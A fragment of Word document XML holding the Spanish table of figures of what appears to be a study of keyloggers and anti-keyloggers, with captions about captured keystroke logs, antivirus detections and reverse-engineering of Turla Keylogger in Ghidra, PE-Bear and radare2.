          <w:instrText xml:space="preserve"> PAGEREF _Toc19358177 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 39. Muestra de la carpeta /logs/ donde queda registrada toda la actividad y tecleo.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358178 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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79" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 40. Pantalla de configuración de Heavenward Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358179 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 41. Carpeta donde se instala la aplicación y fichero de datos que genera.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358180 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 42. Muestra de fichero de datos con información tecleada capturada por el keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358181 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 43. Virus Total muestra como malware a Ghostpress con algunos de sus motores.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358182 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 44. Captura de datos efectuada por el keylogger aun funcionando el anti-keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358183 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 45. El anti-keylogger no trata bien las teclas acentuadas que si hace el keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358184 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 46. Aviso de KL-Detector informando de la detección de un keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358185 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 47. Muestra de PE-Bear. Herramienta para analizar cabeceras PE de ejecutables.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358186 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 48. Muestra parcial del desensamblado del binario con la herramienta PE-Bear.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358187 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 49. Muestra de cadenas de texto encontradas en el binario.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358188 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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89" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 50. Detección de Turla Keylogger por Antivirus de Microsoft.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358189 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 51. Muestra de la información ofrecida en Virus Total (13-agosto-2019).</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358190 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 52. Muestra ejecución del binario en entorno virtual de Hybrid Analysis.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358191 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 53. Muestra de la información ofrecida por INTEZER Analyze.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358192 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 54. Muestra de binarios que tienen partes de coincidencia en el código.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358193 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 55. Ejemplo de punteros a zonas de memoria vacías para rellenar con datos.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358194 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 56. Muestra de bloque de código donde hay repetidas operaciones XOR.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358195 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 57. Muestra tras ejecución dinámica del binario de Turla Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358196 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 58. Muestra parcial de la pantalla de Ghidra una vez cargado el binario a analizar.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358197 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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198" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 59. Muestra parcial de radare2 junto con Cutter una vez cargado el binario a analizar.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358198 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF019A" w:rsidRDefault="008400F5">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId146" w:anchor="_Toc19358199" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 62.Más información ofrecida por el comando «ia» de radare2.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358199 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF019A" w:rsidRDefault="008400F5">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId147" w:anchor="_Toc19358200" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 63. Información ofrecida por el comando «ia» de radare2.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358200 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 62. Información de las secciones, permisos y entropía.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358201 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
